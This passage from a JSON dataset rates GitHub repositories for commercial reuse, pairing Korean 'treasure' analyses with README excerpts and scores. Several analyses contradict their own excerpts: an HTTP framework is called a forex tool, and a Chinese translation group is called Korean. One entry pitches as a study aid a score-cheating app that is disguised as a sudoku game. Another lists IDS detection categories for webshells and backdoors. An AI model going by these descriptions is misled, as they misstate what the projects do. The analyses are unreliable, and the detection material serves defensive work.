MultiSnapRecyclerView 평가 분석\n\n## 왜 보물인가\n스마트폰 앱에서 여러 사진을 한 번에 깔끔하게 보여주는 방식(사진첩 같은 레이아웃)을 만드는 기술로, 모바일 앱 개발자들이 필요로 하는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SNS 앱 개발 회사**: 인스타그램, 틱톡 같은 플랫폼에서 사용자가 여러 사진을 한 화면에","readme_excerpt":"# MultiSnapRecyclerView\n\n<img src=\"https://github.com/TakuSemba/MultiSnapRecyclerView/blob/master/arts/logo.png\">\n\n## Gradle\n\n```groovy\n\ndependencies {\n    implementation 'com.github.takusemba:multisnaprecyclerview:x.x.x'\n}\n\n```\n<br/>\n\n<img src=\"https://github.com/TakuSemba/MultiSnapRecyclerView/blob/master/arts/gravity.gif\" align=\"right\" width=\"30%\">\n\n## Features\n![Build Status](https://app.bitrise.io/app/a27c356998242bdf/status.svg?token=13Mi9qAas0Zm81ono5VWRw&branch=master)\n![Download](https://api.bintray.com/packages/takusemba/maven/multisnaprecyclerview/images/download.svg)\n![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)\n![API](https://img.shields.io/badge/API-13%2B-brightgreen.svg?style=flat)\n\nThis is an Android Library for multiple snapping of RecyclerView.\nMultiSnapRecyclerView easily provides a snapping feature to your recycler view. \nWhat this does are clean, neat, and powerful.\n<br/>\n- [x] gravitated snapping to `start` `end` and `center`.\n- [x] `snap ","composite_score":0.5126,"license_safety_tag":"safe"},{"name":"sahibjotsaggu/San-Francisco-Pro-Fonts","github_url":"https://github.com/sahibjotsaggu/San-Francisco-Pro-Fonts","stars":5,"language":"","license":"unknown","abandonment_months":40,"description":"# San Francisco Pro Fonts 분석\n\n## 왜 보물인가\n세계 최고의 기술 기업들이 사용하는 '산 프란시스코 프로' 폰트를 자유롭게 다운로드할 수 있는 저장소로, 디자인과 웹사이트 제작에 필수적인 고급 글꼴 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 빌더 SaaS**: 사용자들이 전문적인 폰트로 자신의 웹사이트를 꾸밀 수 있는 ","readme_excerpt":"# San Francisco Pro Fonts\n\nObtained from [https://developer.apple.com/fonts/](https://developer.apple.com/fonts/)\n","composite_score":0.5125,"license_safety_tag":"unknown"},{"name":"dairongpeng/algorithm-note","github_url":"https://github.com/dairongpeng/algorithm-note","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":45,"description":"# algorithm-note 상품화 분석\n\n## 왜 보물인가\n프로그래밍을 배우려는 사람들이 헷갈리는 알고리즘 개념들을 쉽게 정리해놓은 학습 자료이기 때문에, 온라인 교육 시장에서 수요가 많습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 알고리즘 튜터링 플랫폼으로 개발하여 취업 준비생에게 판매\n2. **내부 업무 도구**: 대형","readme_excerpt":"# 《algorithm-note》中文版\n\n## 笔记简介\n\n* 对于常用数据结构及算法的系统性总结，java版本参考algorithm-note-java分支，master分支基于Golang实现。\n* 出发点是，算法内容杂且难，系统性整理当成工具书查阅，可以有效帮助复习\n* 如果本系列对您有用，求个star~\n\n## 笔记阅读传送门\n\n- 完整阅读：[进入](https://www.yuque.com/dairongpeng/no7xzv/zw88wn)\n\n## 目录概览\n\n- [x] [第一节 复杂度、排序、二分、异或](https://www.yuque.com/dairongpeng/no7xzv/tkqyqh)\n- [x] [第二节 链表、栈、队列、递归、哈希表、顺序表](https://www.yuque.com/dairongpeng/no7xzv/wxk6gu)\n- [x] [第三节 归并排序、随机快排介绍](https://www.yuque.com/dairongpeng/no7xzv/wck819)\n- [x] [第四节 堆、结构体排序](https://www.yuque.com/dairongpeng/no7xzv/wck819)\n- [x] [第五节 前缀树、桶排序以及排序总结](https://www.yuque.com/dairongpeng/no7xzv/mkuhxb)\n- [x] [第六节 链表相关高频题总结](https://www.yuque.com/dairongpeng/no7xzv/zk422u)\n- [x] [第七节 二叉树基本算法](https://www.yuque.com/dairongpeng/no7xzv/os4mpm)\n- [x] [第八节 二叉树的递归解题思路](https://www.yuque.com/dairongpeng/no7xzv/bvkf4t)\n- [x] [第九节 贪心算法解题思路](https://www.yuque.com/dairongpeng/no7xzv/runxe4)\n- [x] [第十节 并查集、图相关算法介绍](https://www.yuque.com/dairongpeng/no7xzv/fssemq)\n- [x] [第十一节 暴力递归、动态规划](https://","composite_score":0.5125,"license_safety_tag":"safe"},{"name":"Yalantis/PullToMakeFlight","github_url":"https://github.com/Yalantis/PullToMakeFlight","stars":498,"language":"Swift","license":"MIT","abandonment_months":101,"description":"# PullToMakeFlight 분석 보고서\n\n## 왜 보물인가\n스마트폰을 위아래로 드래그할 때 새처럼 날아다니는 애니메이션 효과를 만들 수 있는 기술로, 앱의 사용자 경험을 게임처럼 재미있게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 SaaS**: 코드를 모르는 사람도 드래그 애니메이션을 앱에 넣을 수 있는 노코드 플랫폼으","readme_excerpt":"\n## PullToMakeFlight\n\nCustom animated pull-to-refresh that can be easily added to UIScrollView\n\n[![Yalantis](https://raw.githubusercontent.com/Yalantis/PullToMakeFlight/master/PullToMakeFlightDemo/Resources/badge_dark.png)](https://yalantis.com/?utm_source=github)\n\n<img src=\"https://raw.githubusercontent.com/Yalantis/PullToMakeFlight/master/PullToMakeFlightDemo/Resources/tours-pull-airplane.gif\" />\n\n## Requirements\n\n- iOS 8.0+\n- Xcode 9\n- Swift 4\n\n## Installing with [CocoaPods](https://cocoapods.org)\n\n```ruby\nuse_frameworks!\npod 'PullToMakeFlight', '~> 3.0'\n```\n\n## Usage\n\nAt first, import PullToMakeFlight framework:\n\n```swift\nimport PullToMakeFlight\n```\n\nCreate refresher:\n\n```swift\nlet refresher = PullToMakeFlight()\n```\n\nAdd the refresher to your UIScrollView subclass and provide action block:\n\n```swift\ntableView.addPullToRefresh(refresher) {\n     // action to be performed (pull data from some source)\n}\n```\n\nAfter the action is completed and you want to hide the refresher:\n\n```swift\nta","composite_score":0.5125,"license_safety_tag":"safe"},{"name":"gehaxelt/Python-dsstore","github_url":"https://github.com/gehaxelt/Python-dsstore","stars":500,"language":"Python","license":"MIT","abandonment_months":63,"description":"# Python-dsstore 상품화 분석\n\n## 왜 보물인가\nMac 컴퓨터에서 자동으로 생성되는 숨겨진 파일들을 읽고 분석할 수 있는 도구로, Mac 사용자들의 파일 이용 패턴을 추적하거나 포렌식 조사에 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **Mac 기기 관리 SaaS**: 회사의 Mac 컴퓨터를 중앙에서 관리하는 서비스에 통합하여 직","readme_excerpt":"# Python .DS_Store parser\n\nThis repository contains a parser for Apple's `.DS_Store` file format. \n\nA sample file form a CTF is included in the `./samples/` directory and the you can try the parser using `python3 main.py ./samples/.DS_Store.ctf`. \n\nHere's my blogpost that tries to explain the structure and format in detail:  https://0day.work/parsing-the-ds_store-file-format/\n\n# Usage\n\n```\n$ python main.py samples/.DS_Store.ctf \nCount:  6\nfavicon.ico\nflag\nstatic\ntemplates\nvulnerable.py\nvulnerable.wsgi\n```\n\n# Useful ressources\n\nI found the following links to be quite helpful while developing the parser:\n\n- https://wiki.mozilla.org/DS_Store_File_Format\n- http://search.cpan.org/~wiml/Mac-Finder-DSStore/DSStoreFormat.pod\n- https://digi.ninja/projects/fdb.php\n\n# License\n\nMIT - See License.md\n","composite_score":0.5124,"license_safety_tag":"safe"},{"name":"makerdiary/python-keyboard","github_url":"https://github.com/makerdiary/python-keyboard","stars":500,"language":"Python","license":"MIT","abandonment_months":63,"description":"# python-keyboard 저장소 분석\n\n## 왜 보물인가\n직접 만든 키보드를 프로그래밍으로 자유롭게 커스터마이징할 수 있는 오픈소스 기술로, 기존 키보드의 한계를 벗어나 사용자가 원하는 기능을 직접 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **DIY 키보드 제작 플랫폼 SaaS**: 일반인이 웹 인터페이스에서 키보드 설정을 드래그&드롭으","readme_excerpt":"PYKB - Python Keyboard\n======================\n\n English | [中文][1]\n---------|----------\n\nCreate a hand-wired keyboard, run Python on it, turn it into production.\n\n![](img/python-inside-keyboard.png)\n\n## Hand-wiring a keyboard\nFollow [the guide - hand-wiring-a-keyboard.md](hand-wiring-a-keyboard.md) to rapidly make a keyboard with 100 lines of Python code.\n\n![](img/colorful-keycaps.jpg)\n\n## From prototype to production <sup><kbd>in progress</kbd></sup>\nWith putting more time into the Python keyboard, we find it more and more interesting. We think a Python keyboard can make a big difference, so we decide to design a new keyboard for everyone. Check out [the M60 mechanical keyboard](https://makerdiary.com/m60).\n\n[![](img/m60.jpg)](https://makerdiary.com/m60)\n\n## To be a productive keyboard\nAs the 60% keyboard lacks a lot of keys (F1~F12, arrow keys and etc). We can use\n[features like TMK's layers and composite keys](https://github.com/tmk/tmk_keyboard/blob/master/tmk_core/doc/keymap.md) to","composite_score":0.5124,"license_safety_tag":"safe"},{"name":"doodlewind/jshistory-cn","github_url":"https://github.com/doodlewind/jshistory-cn","stars":13,"language":"TypeScript","license":"unknown","abandonment_months":46,"description":"# jshistory-cn 상용화 분석\n\n## 왜 보물인가\n자바스크립트라는 웹 프로그래밍 언어의 역사와 발전 과정을 체계적으로 정리한 교육 자료로, 개발자 학습과 기업 교육 시장에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 개발자 교육 SaaS**: 프로그래밍 학원이나 온라인 코딩 교육 플랫폼에서 커리큘럼 콘텐츠로 활용\n2. **기업 직","readme_excerpt":"# JavaScript 二十年\n\n<p>\n  <a href=\"https://github.com/doodlewind/jshistory-cn\">\n    <img alt=\"GitHub stars\" src=\"https://img.shields.io/github/stars/doodlewind/jshistory-cn?style=social\"/>\n  </a>\n</p>\n\n<p>\n  <a href=\"https://item.jd.com/13211336.html\">\n    <img alt=\"纸质版\" src=\"./images/book-cover.jpg\"/>\n  </a>\n</p>\n\n本项目已与博文视点合作推出纸质版，其版税收入将有 10% 捐献给 Mozilla，[点击购买](https://item.jd.com/13211336.html)。\n\n## 原文简介\n本书由 JavaScript 之父 Brendan Eich 与 ES6 规范首席作者 Allen Wirfs-Brock 联合编写，详细记载和解读了自 1995 年语言诞生到 2015 年 ES6 规范制定为止，共计 20 年的 JavaScript 语言演化历程。全书不仅讲解了大量语言技术细节层面的演进，更复盘了更高层面上规范制定与标准博弈中的历史成败，是一部讲述人类如何在商业与技术上的竞争合作中促进产业发展的故事。\n\n这个故事相当漫长而复杂。全文分为四个部分，每部分都对应 JavaScript 演化历程中的一个主要阶段。各部分之间还有一段简短的插曲，介绍彼时的开发者们是如何看待与使用 JavaScript 的。\n\n这四个部分依次如下：\n\n1. **[语言诞生](./part-1.md)**（The Origins of JavaScript），介绍了 JavaScript 的创建与早期发展，包括语言的诞生背景、命名方式、初始特性及其设计理念等。这一节还追溯了它在 Netscape 与其他公司最初的演化，例如微软的 JScript。\n2. **[创立标准](./part-2.md)**（Creating a Standard），介绍了从 JavaScript 到 ECMAScript 标准的历程。这主要涵盖 JavaScript 标准化工作的启动、规范的创建、相","composite_score":0.5124,"license_safety_tag":"unknown"},{"name":"appzcoder/30-seconds-of-php-code","github_url":"https://github.com/appzcoder/30-seconds-of-php-code","stars":9,"language":"PHP","license":"CC0-1.0","abandonment_months":65,"description":"# appzcoder/30-seconds-of-php-code 분석\n\n## 왜 보물인가\n웹사이트 개발에 자주 쓰는 짧은 코드 조각들을 모아둔 '개발자용 요리책'으로, 반복적인 작업을 빠르게 해결할 수 있는 실용적인 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 교육 SaaS**\n- 초급 개발자 대상 온라인 강좌 플랫폼에 '일일 코드 팁' 섹션으로","readme_excerpt":"[![Logo](/logo.png)](https://30secondsofcode.org/php/p/1)\n\n# 30 seconds of code\n\n> Short PHP code snippets for all your development needs\n\n* Visit [our website](https://30secondsofcode.org) to view our snippet collection.\n* Use the [Search page](https://30secondsofcode.org/search) to find snippets that suit your needs. You can search by name, tag, language or using a snippet's description. Just start typing a term and see what comes up.\n* Browse the [PHP Snippet List](https://30secondsofcode.org/php/p/1) to see all the snippets in this project or click individual tags at the top of the same page to narrow down your search to a specific tag.\n* Click on each snippet card to view the whole snippet, including code, explanation and examples.\n* You can use the button on the right side of a snippet card to copy the code to clipboard.\n* If you like the project, give it a star. It means a lot to the people maintaining it.\n\n## Want to contribute?\n\n* If you want to help us improve, take a minute ","composite_score":0.5123,"license_safety_tag":"unknown"},{"name":"exchangeratesapi/exchangeratesapi","github_url":"https://github.com/exchangeratesapi/exchangeratesapi","stars":7,"language":"Python","license":"MIT","abandonment_months":42,"description":"# exchangeratesapi 분석\n\n## 왜 보물인가\n환율 정보를 자동으로 제공하는 서비스로, 해외 송금, 수입업체, 여행사 등 환율이 필요한 모든 비즈니스에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **해외송금 앱**: 사용자가 환율을 조회하고 실시간으로 송금액을 계산하는 기능 제공\n2. **무역업 관리 시스템**: 수입업체가 매일의 환","readme_excerpt":"# Exchange Rates API\n\nExchange rates API is a free service for current and historical foreign exchange rates [published by the European Central Bank](https://www.ecb.europa.eu/stats/policy_and_exchange_rates/euro_reference_exchange_rates/html/index.en.html).\n\n[![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=https://github.com/madisvain/exchangeratesapi)\n\n## Usage\n\n#### Lates & specific date rates\nGet the latest foreign exchange rates.\n\n```http\nGET /latest\n```\n\nGet historical rates for any day since 1999.\n\n```http\nGET /2018-03-26\n```\n\nRates are quoted against the Euro by default. Quote against a different currency by setting the base parameter in your request.\n\n```http\nGET /latest?base=USD\n```\n\nRequest specific exchange rates by setting the symbols parameter.\n\n```http\nGET /latest?symbols=USD,GBP\n```\n\n#### Rates history\nGet historical rates for a time period.\n\n```http\nGET /history?start_at=2018-01-01&end_at=2018-09-01\n```\n\nLimit results to speci","composite_score":0.5123,"license_safety_tag":"safe"},{"name":"al0ne/suricata-rules","github_url":"https://github.com/al0ne/suricata-rules","stars":8,"language":"","license":"unknown","abandonment_months":35,"description":"# Suricata Rules 저장소 분석\n\n## 왜 보물인가\n네트워크 침입 탐지 규칙 모음으로, 기업의 사이버 보안 위협을 자동으로 감지하고 차단하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 모니터링 SaaS**: 중소기업을 위한 클라우드 기반 네트워크 방어 서비스로 제공\n2. **내부 업무 도구**: 기업 IT팀의 서버 침입 탐지 시","readme_excerpt":"# suricata-rules\n\tSuricata是一个优秀的开源入侵检测系统，此项目记录安全运营人员提取的高质量Suricata IDS规则,欢迎大家提交。 \n\n## 规则编写要求如下\n每个规则对应新建目录如下\n\n\twebshell检测\t#规则目录名称-按照对应检测规则描述清楚即可\n\t- webshell.pcap\t#规则对应的pcap包，尽量以flow的形式保存\n\t- websehll.rules\t#自己提取的规则文件，尽量测试过提交。\n\t- README\t#可以描述一些规则相关的东西，便于他人理解，支持Markdown\n\n### 规则目录\n\t目录以单个CVE，黑客工具，威胁类型来命名，如果有对应规则目录，建议存放至已有规则目录中。\n\n### 规则对应pcap包\n\t规则对应的pcap通过Wireshark筛选后，利用菜单文件--保存特定分组--选择pcap格式上传。\n\t便于识别恶意流数据，也是最小的，便于移动和备份\n\n### 规则.rules\n\t规则文件命名随意，但后缀必须为rules，如：webshell_caidao.rules\n\t文件中可以出现多个规则文件，README备注中写明\n规则内容建议如下：\n#### 示例\n\tsid类型：\n\t0~1000000   Sourcefire VRT 保留\n\t2000001~2999999     EMerging Threats(ET)\n\t3000000~3999999     公用\n\t网络扫描    3000000～3000999\n\t暴力破解    3001000～3001999\n\t漏洞利用    3002000～3002999\n\t后门链接    3003000～3003999\n\tWebShell    3004000～3004999\n\t病毒木马    3005000～3005999\n\t间谍软件    3006000～3006999\n\t安全认证    3007000～3007999\n\t代码执行    3008000～3008999\n\t文件还原    3009000～3009999\n\t文件传输    3010000～3010999\n\t可疑DNS     3011000～3011999\n\tHTTP请求    3012000～3012999\n\t恶意行为    3013000～3013999\n\t违规操作    301400","composite_score":0.5123,"license_safety_tag":"unknown"},{"name":"studygolang/GCTT","github_url":"https://github.com/studygolang/GCTT","stars":9,"language":"Shell","license":"Apache-2.0","abandonment_months":24,"description":"# GCTT 저장소 분석\n\n## 왜 보물인가\nGo 프로그래밍 언어를 배우고 싶은 사람들을 위해 영어 자료를 한국어로 번역해서 모아놓은 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 한국인 개발자 대상 Go 언어 강의 콘텐츠를 이 자료를 바탕으로 만들어 구독료 받기\n2. **기업 교육 서비스**: 대기업의 개발자 내부 교","readme_excerpt":"# GCTT Go 中文网翻译组\n\n[![Build Status](https://travis-ci.org/studygolang/GCTT.svg?branch=master)](https://travis-ci.org/studygolang/GCTT)\n\n## 简介\n\n![](logo.png)\n\nGCTT (Go Chinese Translation Team) 是 Go 中文网（https://studygolang.com) 翻译组，负责从国外优秀媒体翻译 Go 相关的技术、教程、资讯、杂文等内容。\n\n![](banner.jpg)\n\n## GCTT 的组成\n\n**选题**，负责选择合适的内容，在 [GCTT](https://github.com/studygolang/gctt) 库中提 issue，并打上 「待认领」 标签。\n\n**译者**，负责从选题中选择内容进行翻译。\n\n**校对**，负责将初译的文章进行文字润色、技术校对等工作。\n\n**发布**，负责将校对后的文章，排版发布到 Go 中文网 的文章中。\n\n## 加入我们\n\n请首先加入翻译组的 QQ 群，群号是：423373670，加群时请说明是“志愿者”。加入后记得修改您的群名片为您的 GitHub 的 ID。**同时强烈建议注册 Go 中文网账号并和 GitHub 账号绑定，这样无论是翻译提醒和后期译文发布，都会和你的中文网账号关联。**\n\n关注微信公众号：Go语言中文网\n\n![](wechat.png)\n\n## 如何开始\n\n加入的成员，请先阅读 [WIKI 如何开始](https://github.com/studygolang/GCTT/wiki)。\n\n为了让大家更好地参与 GCTT，翻译组成员 [jarry](https://github.com/cureking) 录制了一套教学视频：\n\n* [GCTT 翻译流程（Part I-准备工作，获取任务)](https://www.bilibili.com/video/av29042507)\n* [GCTT 翻译流程（Part II-打开文章，翻译注意)](https://www.bilibili.com/video/av29292296)\n* [GCTT 翻译流程（Part III-提交任务，修改错误)](https://www","composite_score":0.5123,"license_safety_tag":"safe"},{"name":"sunainapai/makesite","github_url":"https://github.com/sunainapai/makesite","stars":6,"language":"Python","license":"MIT","abandonment_months":39,"description":"# sunainapai/makesite 분석\n\n## 왜 보물인가\n코딩 없이 웹사이트를 자동으로 만들어주는 간단한 도구로, 누구나 쉽게 온라인 공간을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: \"5분 만에 포트폴리오 사이트 만들기\" 같은 웹사이트 빌더 서비스로 개인 사용자에게 월 구독 판매\n- **내부 업무 도구**: 소규모","readme_excerpt":"makesite.py\n===========\n\nTake full control of your static website/blog generation by writing your\nown simple, lightweight, and magic-free static site generator in\nPython. That's right! Reinvent the wheel!\n\n[![View Source][SOURCE-BADGE]](makesite.py)\n[![View Demo][DEMO-BADGE]](https://tmug.github.io/makesite-demo)\n[![MIT License][LICENSE-BADGE]](LICENSE.md)\n\n[SOURCE-BADGE]: https://img.shields.io/badge/view-source-brightgreen.svg\n[DEMO-BADGE]: https://img.shields.io/badge/view-demo-brightgreen.svg\n[LICENSE-BADGE]: https://img.shields.io/badge/license-MIT-blue.svg\n\n\nContents\n--------\n\n* [Introduction](#introduction)\n* [But Why?](#but-why)\n* [Get Started](#get-started)\n* [The Code](#the-code)\n* [Layout](#layout)\n* [Content](#content)\n* [FAQ](#faq)\n* [Credits](#credits)\n* [License](#license)\n* [Support](#support)\n\n\nIntroduction\n------------\n\nThis repository contains the source code of an example website\ncontaining two static blogs and a few static pages. The website can be\ngenerated by run","composite_score":0.5123,"license_safety_tag":"safe"},{"name":"wasabifx/wasabi","github_url":"https://github.com/wasabifx/wasabi","stars":500,"language":"Kotlin","license":"unknown","abandonment_months":80,"description":"# Wasabi FX 저장소 분석\n\n## 왜 보물인가\n외환(환율) 거래 데이터를 자동으로 처리하는 도구로, 금융사나 무역업체가 수작업으로 하던 환율 관리를 빠르고 정확하게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 무역회사를 위한 월 구독형 환율 자동 관리 서비스\n2. **내부 업무 도구**: 대형 유통사나 수입업체의 ","readme_excerpt":"[![Download](https://api.bintray.com/packages/wasabifx/wasabifx/wasabi/images/download.svg) ](https://bintray.com/wasabifx/wasabifx/wasabi/_latestVersion)\n[![TeamCity](http://teamcity.jetbrains.com/app/rest/builds/buildType:(id:Wasabi_FullBuild)/statusIcon)](http://teamcity.jetbrains.com/viewType.html?buildTypeId=Wasabi_FullBuild)\n \nWasabi - An HTTP Framework\n========================\n\n### IMPORTANT ###\n\ntl;dr We are merging with [Ktor](https://github.com/kotlin/ktor). \n\nKtor and Wasabi both have the same goals - define a simple, extensible HTTP framework for the JVM, built with Kotlin. Wasabi was created before Ktor and Ktor is influenced significantly by Wasabi. The recent commitment by the core team (@swishy and @hhariri) has unfortunately been impacted due to other commitments and we've decided that the best way to move forward is to join efforts with the #Ktor team to provide the best possible experience for our users. Given Wasabi and Ktor similarity, migration shouldn't be an iss","composite_score":0.5122,"license_safety_tag":"unknown"},{"name":"victorporof/Tilt","github_url":"https://github.com/victorporof/Tilt","stars":499,"language":"JavaScript","license":"NOASSERTION","abandonment_months":133,"description":"# Tilt 저장소 분석\n\n## 왜 보물인가\n웹 페이지를 기울이는 효과를 만드는 간단한 도구로, 웹사이트의 시각적 매력을 손쉽게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **포트폴리오 SaaS**: 프리랜서나 디자이너가 자신의 작품을 더 돋보이게 만들기 위한 웹 효과 도구\n2. **마케팅 에이전시 도구**: 클라이언트 웹사이트에 인터랙티브 효과를","readme_excerpt":"# Tilt: a WebGL-based 3D visualization of a Webpage\n#### [Development Blog](http://blog.mozilla.com/tilt/)\n#### [Tilt Project Page](https://wiki.mozilla.org/Tilt_Project_Page)\n\n### Firefox integration\nTilt is currently implemented natively in Firefox starting with version 11, part of the Developer Tools -> Inspector. You can track the development in the [mozilla-central branch](https://github.com/victorporof/Tilt/tree/mozilla-central). If you have a Bugzilla account, [here are all the known bugs and features](https://bugzilla.mozilla.org/buglist.cgi?cmdtype=runnamed&namedcmd=tilt&list_id=1947264) we're working on - you're welcome to file new requests in there or even help out if you want to!\n\nTake a look at [Firefox Aurora](http://www.mozilla.org/en-US/firefox/channel/) or [Firefox Nightly](http://nightly.mozilla.org/) to try out the new and improved Tilt!\n\n### Help\nIf you have any questions, ping anyone on IRC in `#devtools` or `#tilt` on [irc.mozilla.org](irc://irc.mozilla.org).\n\n###","composite_score":0.5122,"license_safety_tag":"unknown"},{"name":"lucidrains/big-sleep","github_url":"https://github.com/lucidrains/big-sleep","stars":9,"language":"Python","license":"MIT","abandonment_months":52,"description":"# Big Sleep 저장소 분석\n\n## 왜 보물인가\n텍스트 설명만으로 원하는 이미지를 자동으로 생성하는 AI 기술로, 창의적인 콘텐츠 제작에 혁신을 가져올 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 마케팅팀이 광고 이미지를 빠르게 생성하는 웹 플랫폼\n- **내부 업무 도구**: 게임 회사가 컨셉 아트 초안을 자동으로 만드는 디자","readme_excerpt":"<img src=\"./samples/artificial_intelligence.png\" width=\"250px\"></img>\n\n*artificial intelligence*\n\n<img src=\"./samples/cosmic_love_and_attention.png\" width=\"250px\"></img>\n\n*cosmic love and attention*\n\n<img src=\"./samples/fire_in_the_sky.png\" width=\"250px\"></img>\n\n*fire in the sky*\n\n<img src=\"./samples/a_pyramid_made_of_ice.png\" width=\"250px\"></img>\n\n*a pyramid made of ice*\n\n<img src=\"./samples/a_lonely_house_in_the_woods.png\" width=\"250px\"></img>\n\n*a lonely house in the woods*\n\n<img src=\"./samples/marriage_in_the_mountains.png\" width=\"250px\"></img>\n\n*marriage in the mountains*\n\n<img src=\"./samples/a_lantern_dangling_from_the_tree_in_a_foggy_graveyard.png\" width=\"250px\"></img>\n\n*lantern dangling from a tree in a foggy graveyard*\n\n<img src=\"./samples/a_vivid_dream.png\" width=\"250px\"></img>\n\n*a vivid dream*\n\n<img src=\"./samples/balloons_over_the_ruins_of_a_city.png\" width=\"250px\"></img>\n\n*balloons over the ruins of a city*\n\n<img src=\"./samples/the_death_of_the_lonesome_astronomer.png\" widt","composite_score":0.5122,"license_safety_tag":"safe"},{"name":"CyberPunkMetalHead/binance-trading-bot-new-coins","github_url":"https://github.com/CyberPunkMetalHead/binance-trading-bot-new-coins","stars":79,"language":"Python","license":"MIT","abandonment_months":56,"description":"# 바이낸스 신규 코인 자동 거래 봇 분석\n\n## 왜 보물인가\n암호화폐 거래소에 새로 상장되는 코인을 자동으로 감지하고 빠르게 매매해주는 도구로, 사람이 놓치기 쉬운 수익 기회를 기계가 24/7 자동으로 포착할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독료를 받고 이 봇을 클라우드에서 운영해주는 웹 서비스로 판매\n2. *","readme_excerpt":"# binance-trading-bot-new-coins\nThis Binance trading bot detects new coins as soon as they are listed on the Binance exchange and automatically places sell and buy orders. \nIt comes with trailing stop loss and other features.\n\nThis open source crypto trading bot should able able to quickly detect new coins listings on Binance and quickly ride the price spike. \nIt comes with a live and test mode so naturally, use at your own risk.\n\n\n<p>&nbsp;</p>\n\n**For a step-by-step guide on how to set it up and configure please see the guide here:** [Binance new coin trading bot guide](https://www.cryptomaton.org/2021/08/15/coding-a-binance-trading-bot-that-detects-new-coins-the-moment-they-are-listed/)\n\n\n<p>&nbsp;</p>\n\n**The new coins crypto trading bot explained in more detail.<br> \nSee the video linked below for an explanation and rationale behind the bot.**\n\n[![binance new coin listings bot](https://img.youtube.com/vi/mIa9eQDhubs/0.jpg)](https://www.youtube.com/watch?v=mIa9eQDhubs)\n\n","composite_score":0.5122,"license_safety_tag":"safe"},{"name":"hua1995116/react-resume-site","github_url":"https://github.com/hua1995116/react-resume-site","stars":13,"language":"TypeScript","license":"GPL-3.0","abandonment_months":26,"description":"# react-resume-site 상용화 분석\n\n## 왜 보물인가\n누구나 몇 번의 클릭으로 전문적인 이력서 웹사이트를 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 구직자들이 구독료를 내고 자신의 이력서를 멋진 웹사이트로 자동 변환하는 월간 구독 서비스\n2. **내부 업무 도구**: 대기업 인사팀이 직원들의 프로필을","readme_excerpt":"# 木及简历\n\n一款用 `Markdown`就能写出好看简历的在线工具，告别使用 word 繁杂的编写方式。\n\n我们希望帮助你 **「以最简单的方式来写好简历，只需专注于自身的内容而无需关注排版」**\n\n立即体验 👉  https://www.mujicv.com\n\n# 功能特点\n\n- 📝 Markdown书写方式，简单易上手\n\n- 🚀 实时预览PDF并导出，导出效果 **「所见即所得」**\n\n- ✨  **智能一页**，自动识别，完美排版\n\n- 🌟 一份内容，轻松应用任意简历模板\n\n- 🎏 海量「极简」主题与模板\n\n- ☁️ 远端存储，数据永不丢失\n\n- 🎯 可视化定位，「内容 - 视图」双向可寻迹\n\n- 📎 证件照位置及大小可修改，打破传统模板约束\n\n- 🥁 支持导入导出Markdown，随时随地可编写\n\n# 模板展示\n\n![image](https://user-images.githubusercontent.com/12070073/134211577-ce58db6c-bfde-4af9-b73a-a5948e98481a.png)\n\n![image](https://user-images.githubusercontent.com/12070073/134211433-72dfbd88-ebc2-4fb1-bb35-675a624dbfce.png)\n\n![image](https://user-images.githubusercontent.com/12070073/134211967-9457fbb0-67b2-4f5d-b3b1-41cbc9b74532.png)\n\n\n## 开始使用\n\n### Docker 使用 | 推荐\n\n> 使用 docker 运行，默认本地已经拥有可运行的 docker 环境\n\n使用 `Terminal` 终端，运行下面命令\n\n```sh\n$ docker run --rm -d -p 3000:80 yanzhiwei147/muji\n```\n\n打开 [`http://localhost:3000/`](http://localhost:3000/)\n\n### 源码使用\n\n```\n$ git clone https://github.com/hua1995116/react-resume-site.git && cd","composite_score":0.5121,"license_safety_tag":"restricted"},{"name":"studyhelperhelper/studyhelper","github_url":"https://github.com/studyhelperhelper/studyhelper","stars":5,"language":"","license":"unknown","abandonment_months":26,"description":"# StudyHelper 저장소 분석\n\n## 왜 보물인가\n학생들의 공부 효율을 높이기 위해 만든 도구로, 단순하면서도 실제 필요한 기능들을 담고 있어 교육 시장에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 학습 플랫폼으로 학생들에게 공부 관리 기능 제공\n2. **내부 업무 도구**: 학원, 과외센터의 강사용 학생","readme_excerpt":"# 学习助手  学习强国  刷分  数独\n\n点击下面链接下载。<br>\nhttps://github.com/studyhelperhelper/studyhelper/releases/download/latest/learningsudoku1.2.56.0-1.apk\n<br>\n<a href=\"https://github.com/studyhelperhelper/studyhelper/releases/download/latest/learningsudoku1.2.56.0-1.apk\">apk下载地址</a><br/>\n<br>\n2024年4月21日更新：<br>1.适配学习强国V2.56.0，修订内存溢出bug，更新了部分题库，请删除原app后再安装新的才能更新题库。<br>2.请卸载重新安装。<br>3.为更新最新题库，请先卸载原APP再安装新版本。若在APP内下载，下载目录在手机根目录下apk文件夹中。<br>\n\n\n# 使用说明\n这是一个伪装成数独游戏的学习强国助手。<br>\n助手藏在数独游戏的最后一个按钮“隐藏功能”里面，点击隐藏功能播放广告获得奖励后打开学习强国助手主界面，如下图。<br>\n<div align=\"center\">\n    <img src=\"./img/01.jpg\" width=\"200\"><img src=\"./img/02.jpg\" 